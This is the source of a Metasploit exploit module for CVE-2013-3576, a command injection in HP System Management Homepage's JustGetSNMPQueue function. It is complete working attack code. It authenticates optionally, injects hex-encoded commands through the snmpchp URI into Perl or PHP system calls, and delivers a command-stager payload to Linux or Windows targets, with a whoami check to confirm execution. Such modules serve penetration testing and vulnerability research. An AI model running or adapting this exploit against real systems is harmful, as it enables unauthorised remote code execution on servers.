## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'HP System Management Homepage JustGetSNMPQueue Command Injection', 'Description' => %q{ This module exploits a vulnerability found in HP System Management Homepage. By supplying a specially crafted HTTP request, it is possible to control the 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), which will be used in a exec() function. }, 'License' => MSF_LICENSE, 'Author' => [ 'Markus Wulftange', # Discovery & multi-platform Metasploit module 'sinn3r' # initial Windows Metasploit module ], 'References' => [ ['CVE', '2013-3576'], ['OSVDB', '94191'], ['US-CERT-VU', '735364'] ], 'DefaultOptions' => { 'SSL' => true }, 'Targets' => [ [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86, 'CmdStagerFlavor' => 'bourne' } ], [ 'Linux (x64)', { 'Platform' => 'linux', 'Arch' => ARCH_X64, 'CmdStagerFlavor' => 'bourne' } ], [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86, 'CmdStagerFlavor' => 'vbs' } ], [ 'Windows (x64)', { 'Platform' => 'win', 'Arch' => ARCH_X64, 'CmdStagerFlavor' => 'vbs' } ], ], 'Privileged' => false, 'DisclosureDate' => '2013-06-11', 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_options( [ Opt::RPORT(2381), # USERNAME/PASS may not be necessary, because the anonymous access is possible OptString.new('USERNAME', [false, 'The username to authenticate as']), OptString.new('PASSWORD', [false, 'The password to authenticate with']) ] ) end def post_auth? true end def check @cookie = '' sig = Rex::Text.rand_text_alpha(10) cmd = "echo #{sig}&&whoami&&echo #{sig}" res = send_command(cmd) if !res vprint_error('Connection timed out') return Exploit::CheckCode::Unknown('Could not connect to the target') end if res.code == 200 && res.body =~ /#{sig}/ vprint_good("Running with user '#{res.body.split(sig)[1].strip}'") return Exploit::CheckCode::Vulnerable('Successfully verified code execution on the target') end Exploit::CheckCode::Safe('The target is not vulnerable') end def login username = datastore['USERNAME'] password = datastore['PASSWORD'] cookie = '' res = send_request_cgi({ 'method' => 'POST', 'uri' => '/proxy/ssllogin', 'vars_post' => { 'redirecturl' => '', 'redirectquerystring' => '', 'user' => username, 'password' => password } }) if !res fail_with(Failure::Unknown, "#{peer} - Connection timed out during login") end # CpqElm-Login: success if res.headers['CpqElm-Login'].to_s =~ /success/ cookie = res.get_cookies.scan(/(Compaq-HMMD=[\w-]+)/).flatten[0] || '' end cookie end def setup_stager execute_cmdstager(temp: './', linemax: 2800) end def execute_command(cmd, _opts = {}) # Encodes command as sequence of hex values to be passed to the Perl/PHP # function `pack("N*", ...)` that is then used in a `system(...)` call. # trailing bytes need to be handled separately rem = cmd.size % 4 if rem != 0 last_bytes = ".chr(#{cmd[-rem..-1].each_byte.map(&:ord).join(').chr(')})" cmd = cmd[0...-rem] end # convert double words into hex representation dwords = cmd.each_byte.each_slice(4).map do |dw| sprintf('0x%x', dw.pack('C*').unpack('N')[0]) end # build final Perl/PHP code that is getting executed script_code = "system(pack(chr(78).chr(42),#{dwords.join(',')})#{last_bytes});" # build Perl/PHP invocation command case target.opts['Platform'] # Perl for Linux as it's more likely to be in the PATH when 'linux' then cmd = "perl -e '#{script_code}'" # PHP for Windows when 'win' then cmd = "php -r #{script_code}" end res = send_command(cmd) if res && res.code != 200 vprint_error("Unexpected response:\n#{res}") fail_with(Failure::Unknown, 'There was an unexpected response') end end def send_command(cmd) if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty? @cookie = login if @cookie.empty? fail_with(Failure::NoAccess, "#{peer} - Login failed") else print_good("Logged in as '#{datastore['USERNAME']}'") end end req_opts = {} req_opts['uri'] = generate_uri(cmd) unless @cookie.empty? browser_chk = 'HPSMH-browser-check=done for this session' curl_loc = "curlocation-#{datastore['USERNAME']}=" req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}" end send_request_raw(req_opts) end def generate_uri(cmd) "#{normalize_uri('smhutil', 'snmpchp/')}&#{cmd.gsub(/ /, '%20')}&&echo" end def exploit @cookie = '' setup_stager end end